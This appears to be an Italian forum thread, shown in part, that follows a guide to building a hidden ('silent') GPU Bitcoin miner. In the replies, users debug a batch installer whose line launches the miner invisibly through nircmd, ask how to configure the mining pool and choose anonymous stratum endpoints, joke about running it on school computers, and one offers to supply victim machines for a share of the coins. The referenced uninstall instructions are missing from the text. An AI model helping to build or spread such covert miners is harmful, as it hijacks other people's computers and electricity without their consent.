Hyip [GUIDA] Creare un Silent GPU Miner per Bitcoin

Stato
Discussione chiusa ad ulteriori risposte.
È il valore più piccolo del Bitcoin ovvero 0.00000001 Bitcoin.
Ti faccio una legenda:

1 BTC = 100,000,000 Satoshis

1 mBTC = 100,000 Satoshis

1 μBTC = 100 Satoshis
 
Salve, sono interessato a collaborare con qualcuno che si occupi di gestire il processo come sta facendo. Io mi occuperò di procurare la materia prima per generare molti più BTC. Chi è interessato può contattarmi tramite mex privato.
 
Salve, sono interessato a collaborare con qualcuno che si occupi di gestire il processo come sta facendo. Io mi occuperò di procurare la materia prima per generare molti più BTC. Chi è interessato può contattarmi tramite mex privato.

1° Il 1° messaggio è per presentarsi
2° Collaboratori di cosa? hahahh :asd:
 
  • Mi piace
Reazioni: Kerbs
Ultima modifica da un moderatore:
Bisogna usarlo sui pc della scuola :sisi:

Edit: Nel file dove inserisco i dati, ci metto i dati della pool in cui "lavoro"?
 
Ultima modifica:
Ciao, ho seguito tutta la procedura, ma installer.bat verso la fine si bloccava. In effetti mi dava errore su questa riga: start %INSTALLPATH%\nircmd.exe exec hide %INSTALLPATH%\start.bat .
Precisamente quando arrivava all' ultimo start.bat mi diceva: " Impossibile trovare il file exec ". Questa cosa l'ho risolta. Dipendeva da un errore nel listato, che io avevo copiato fedelmente, dato che c'erano delle virgolette che non dovevano esserci. Ora installer.bat non da più nessun errore. Però quando eseguo l' installer.exe non succede niente almeno per quanto riguarda il file cgminer.exe che non vedo tra i processi. Cosa dovrei modificare ?
Grazie per le risposte.
 
SET ARG0=-o stratum+tcp://stratum.mining.eligius.st:3334

Raga non so cosa mettere al posto di stratum+tcp://stratum.mining.eligius.st:3334

Aiutino?
 
Salve [MENTION=151785]Killshot[/MENTION] ho da pocco iniziato a studiare lo scripting bash e ho notato una grande somilianza con il codice che hai usato volevo chiederti cos'è il linguaggio di scripting di windows?
 
Credo mi abbiano messo un silent nel mio pc. Non so se l'avete già detto, ma:

Come lo tolgo? xD
Note:
- Se cambiate il nome cgminer.exe anche il nome del processore che mina verrà cambiata, in questo caso vi basterà cambiare sia il nome nella cartella CGMiner sia nel file Batch.

- Se volete disinfettarvi vi basterà creare un file TXT ed inserire
Salvate il tutto come uninstall.bat ed avviatelo.

Ovviamente ciò vale solo se il miner che hai è del tipo di questo thread
 
Nella parte Username immetti il nome del tuo Worker
Nella parte Password immetti la password del tuo worker.
Per l'ip dipende da pool a pool, ma ti consiglio di usare gli ip di Stratum in quanto sono anonimi quindi, una protezione maggiore.

Io consiglio Eligius che ha 0% di tasse ma c'è anche mining.bitcoin.cz non è male.
Ma non ho capito cosa è il worker e dove lo trovo
 
Stato
Discussione chiusa ad ulteriori risposte.